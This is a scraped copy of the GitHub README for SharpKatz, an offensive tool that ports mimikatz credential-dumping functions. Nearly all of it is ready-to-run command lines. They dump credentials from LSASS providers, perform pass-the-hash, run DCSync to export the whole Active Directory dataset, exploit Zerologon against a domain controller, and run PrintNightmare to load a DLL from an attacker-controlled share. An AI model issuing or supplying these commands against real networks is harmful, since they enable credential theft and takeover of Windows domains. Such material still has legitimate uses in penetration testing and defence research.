GitHub - b4rtik/SharpKatz: Porting of mimikatz sekurlsa::logonpasswords, sekurl...
source link: https://github.com/b4rtik/SharpKatz/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
SharpKatz
Porting of mimikatz sekurlsa::logonpasswords, sekurlsa::ekeys and lsadump::dcsync commands
Usage
Ekeys
SharpKatz.exe --Command ekeys
list Kerberos encryption keys
SharpKatz.exe --Command msv
Retrive user credentials from Msv provider
Kerberos
SharpKatz.exe --Command kerberos
Retrive user credentials from Kerberos provider
Tspkg
SharpKatz.exe --Command tspkg
Retrive user credentials from Tspkg provider
Credman
SharpKatz.exe --Command credman
Retrive user credentials from Credman provider
WDigest
SharpKatz.exe --Command wdigest
Retrive user credentials from WDigest provider
Logonpasswords
SharpKatz.exe --Command logonpasswords
Retrive user credentials from all providers
SharpKatz.exe --Command pth --User username --Domain userdomain --NtlmHash ntlmhash
Perform pth to create a process under userdomain\username credential with ntlm hash of the user's passwordSharpKatz.exe --Command pth --User username --Domain userdomain --Rc4 rc4key
Perform pth to create a process under userdomain\username credential user's rc4 keySharpKatz.exe --Command pth --Luid luid --NtlmHash ntlmhash
Replace ntlm hash for an existing logonsession SharpKatz.exe --Command pth --User username --Domain userdomain --NtlmHash ntlmhash --aes256 aes256
Perform pth to create a process under userdomain\username credential with ntlm hash of the user's password and aes256 key
DCSync
SharpKatz.exe --Command dcsync --User user --Domain userdomain --DomainController dc
Dump user credential by username SharpKatz.exe --Command dcsync --Guid guid --Domain userdomain --DomainController dc
Dump user credential by GUID SharpKatz.exe --Command dcsync --Domain userdomain --DomainController dc
Export the entire dataset from AD to a file created in the current user's temp forderSharpKatz.exe --Command dcsync --User user --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword
Dump user credential by username using alternative credentialsSharpKatz.exe --Command dcsync --Guid guid --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword
Dump user credential by GUID using alternative credentialsSharpKatz.exe --Command dcsync --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword
Export the entire dataset from AD to a file created in the current user's temp forder using alternative credentials
Zerologon
No reference to logoncli.dll, using the direct rpc call works even from a non-domain joined workstation
SharpKatz.exe --Command zerologon --Mode check --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$
Perform Zerologon check SharpKatz.exe --Command zerologon --Mode exploit --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$
Perform Zerologon attack SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --User krbtgt --DomainController WIN-NSE5CPCP07C.testlab2.local
Perform Zerologon attack and dump user credential by username SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --Guid guid --DomainController WIN-NSE5CPCP07C.testlab2.local
Perform Zerologon attack and dump user credential by GUID SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --DomainController WIN-NSE5CPCP07C.testlab2.local
Perform Zerologon attack and export the entire dataset from AD to a file created in the current user's temp forder
Note: Do not use zerologon in a production environment or at least plan for recovery actions which are detailed here
PrintNightmare CVE-2021-1675 - CVE-2021-34527
SharpKatz.exe --Command printnightmare --Target dc --Library \\\\mycontrolled\\share\\fun.dll
Perform PrintNightmare attack SharpKatz.exe --Command printnightmare --Target dc --Library \\\\mycontrolled\\share\\fun.dll --AuthUser user --AuthPassword password --AuthDomain dom
Perform PrintNightmare attack with provided credentials
Credits
This project depends entirely on the work of Benjamin Delpy and Vincent Le Toux on Mimikatz and MakeMeEnterpriseAdmin projects.
The analysis of the code was conducted following the example from this blog post by xpn.
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK